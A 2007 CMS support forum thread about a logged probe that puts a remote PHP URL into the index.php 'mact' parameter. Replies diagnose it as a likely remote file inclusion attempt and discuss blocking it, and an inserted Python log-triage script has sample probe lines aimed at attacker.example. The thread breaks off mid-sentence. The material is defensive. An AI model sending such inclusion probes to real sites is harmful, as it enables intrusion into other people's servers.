All times are UTC

Post subject: Is this something to worry about?
PostPosted: Wed Sep 19, 2007 9:51 pm
Forum Members

Joined: Fri May 12, 2006 7:40 am
Posts: 221
I was just looking in some logs and I see some user agent is trying to add strange URLs. Does anyone know if this is a risk?


Host: ********** (changed)

/index.php?mact=http:****//0xg3458.hub.io/pb****.php? (the **** are put in by myself to make it a wrong link)

Http Code: 200 Date: Sep 19 23:09:06 Http Version: HTTP/1.1 Size in Bytes: 10786

Referer: -

Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)


Last edited by Anonymous on Wed Sep 19, 2007 9:56 pm, edited 1 time in total.

Post subject: Re: Is this something to worry about?
PostPosted: Wed Sep 19, 2007 10:05 pm
Dev Team Member

Joined: Tue Oct 19, 2004 6:44 pm
Posts: 6587
Location: Fernie British Columbia, Canada
Yeah, it's something to worry about.

_________________
Follow me on twitter
--
if you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
----------------
Don't make me angry..... you won't like me when I'm angry....


Post subject: Re: Is this something to worry about?
PostPosted: Wed Sep 19, 2007 10:06 pm
Forum Members

Joined: Fri May 12, 2006 7:40 am
Posts: 221
And what's the best thing to do about it?


Post subject: Re: Is this something to worry about?
PostPosted: Wed Sep 19, 2007 10:15 pm
Dev Team Member

Joined: Tue Oct 19, 2004 6:44 pm
Posts: 6587
Location: Fernie British Columbia, Canada
Analyze the URL, see if they're fishing, or if there's a potential vulnerability in the code that they're trying to exploit, then potentially fool with your firewall rules to block that account

and/or fool with mod security to reject those queries.... use caution here though, as you could block some valid behaviour.

_________________
Follow me on twitter
--
if you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
----------------
Don't make me angry..... you won't like me when I'm angry....
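
An added example, not part of any post in this thread: a small Python triage of access-log lines that flags query parameters whose decoded value starts with a remote-URL scheme, as in the mact probe reported above. The log lines, hostnames and verdict labels are constructed for illustration, and the Apache combined log format and the sample mact value are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines (Apache combined format assumed; not from the thread).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Sep/2007:23:09:06 +0000] "GET /index.php?mact=http://attacker.example/pb.php? HTTP/1.1" 200 10786 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
192.0.2.11 - - [19/Sep/2007:23:10:41 +0000] "GET /index.php?mact=hTTp%3A%2F%2Fattacker.example%2Fpb.php%3F HTTP/1.1" 200 10786 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
198.51.100.7 - - [19/Sep/2007:23:11:02 +0000] "GET /index.php?mact=News,cntnt01,detail,0&cntnt01articleid=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.8 - - [19/Sep/2007:23:12:30 +0000] "GET /index.php?page=links&ref=http://partner.example/ HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
"""

# client IP, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# A value that begins with a stream-wrapper style scheme is a remote-include candidate.
REMOTE_RE = re.compile(r'^\s*(?:(?:https?|ftps?|php)://|data:)', re.I)


def triage(log_text):
    """Return (ip, status, param, decoded_value, verdict) per suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, _method, target, status = m.groups()
        query = urlsplit(target).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # second decode catches double-encoded values
            if not REMOTE_RE.match(value):
                continue
            # mact names a module call, so a URL there is never legitimate;
            # other parameters may carry URLs validly and need a human look.
            verdict = "block" if name == "mact" else "review"
            findings.append((ip, int(status), name, value, verdict))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The status code is reported but not used for the verdict, since a site that redirects errors to its homepage answers such probes with 200. The "review" verdict on the last sample line is the kind of valid behaviour a blanket blocking rule would catch.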


Post subject: Re: Is this something to worry about?
PostPosted: Wed Sep 19, 2007 10:29 pm
Forum Members

Joined: Fri May 12, 2006 7:40 am
Posts: 221
Ok thanks,

Well, the URL http:****//0xg3458.hub.io/pb****.php?  now gives this message:

The web page you are trying to access has been removed by our server administrator.
We do not allow porn pages (anything with complete nudity) or any illegal pages!

Before that it looked like a compressed PHP script, so I guess they already deleted it at 2ip.com which owns hub**.io

When I tried to do the same thing it basically gave me a 404 and redirected me to my homepage because of a .htaccess rule which redirects all 404 errors to the homepage.

It was tried 2 times from different IPs; I can't find any new tries though.


Last edited by Anonymous on Wed Sep 19, 2007 10:55 pm, edited 1 time in total.

Post subject: Re: Is this something to worry about?
PostPosted: Wed Sep 19, 2007 11:00 pm
Forum Members

Joined: Fri May 12, 2006 7:40 am
Posts: 221
The only thing that uses "index.php?mact" is the news module.

He or she just tried:  http://www.domain.ltd/index.php?mact=ht ... pb****.php?

Well, as far as my knowledge goes, I can't find anything that could be harmed with that.


Post subject: Re: Is this something to worry about?
PostPosted: Thu Sep 20, 2007 10:35 am
Support Guru

Joined: Mon Jul 04, 2005 5:12 pm
Posts: 4820
Location: Ferrara, Italy
DestoMedia wrote:
The only thing that uses "index.php?mact" is the news module.


No, it's a normal call for modules.
Maybe a try for a possible include (and URL fopen wrappers enabled).
I have not checked in the source if mact does an include, but I don't think so.

Alby

_________________
CMSMS Support Team
Italian Admin and Moderator

Plugins: Geolocate hostip, Multiple random image, Image rotator (beta), Content Pagination
Modules: ForumMadeSimple (Howto), TranslationManager
Multilingual: MLE is not CMSMS


Post subject: Re: Is this something to worry about?
PostPosted: Thu Sep 20, 2007 1:30 pm
Support Guru

Joined: Mon Jul 24, 2006 3:27 pm
Posts: 3690
Location: Paris
calguy1000 wrote:
...and/or fool with mod security to reject those queries.... use caution here though, as you could block some valid behaviour.


+1. Beware of such queries. Don't let them reach PHP. Block them beforehand, at the webserver level. Here are some hints with mod_rewrite.

Pierre M.

_________________
-- Pierre, support team member, co-moderator of the French-language forum.
Please read "how to submit installation/support requests" before posting. Don't send private messages to ask for support.
Want to contribute to CMSms ? Improve the wiki with your forum account.


Post subject: Re: Is this something to worry about?
PostPosted: Thu Sep 20, 2007 3:31 pm
Forum Members

Joined: Fri May 12, 2006 7:40 am
Posts: 221
alby wrote:
DestoMedia wrote:
The only thing that uses "index.php?mact" is the news module.


No, it's a normal call for modules.
Maybe a try for a possible include (and URL fopen wrappers enabled).
I have not checked in the source if mact does an include, but I don't think so.

Alby


URL f_open is disabled in the php.ini.


Post subject: Re: Is this something to worry about?
PostPosted: Thu Sep 20, 2007 3:34 pm
Forum Members

Joined: Fri May 12, 2006 7:40 am
Posts: 221
Pierre M. wrote:
calguy1000 wrote:
...and/or fool with mod security to reject those queries.... use caution here though, as you could block some valid behaviour.


+1. Beware of such queries. Don't let them reach PHP. Block them beforehand, at the webserver level. Here are some hints with mod_rewrite.

Pierre M.


Thanks for the link, I'll look into that. I have been slacking on enabling pretty URLs for this site, so I'll first look at making the website use mod_rewrite pretty URLs and blocking potentially risky requests.


Post subject: Re: Is this something to worry about?
PostPosted: Thu Sep 20, 2007 4:17 pm
Forum Members

Joined: Fri May 12, 2006 7:40 am
Posts: 221
Well, I've looked at blocking these attacks with .htaccess

And it works very well, added a few extra lines, besides the ones Pierre pointed out, for blocking  "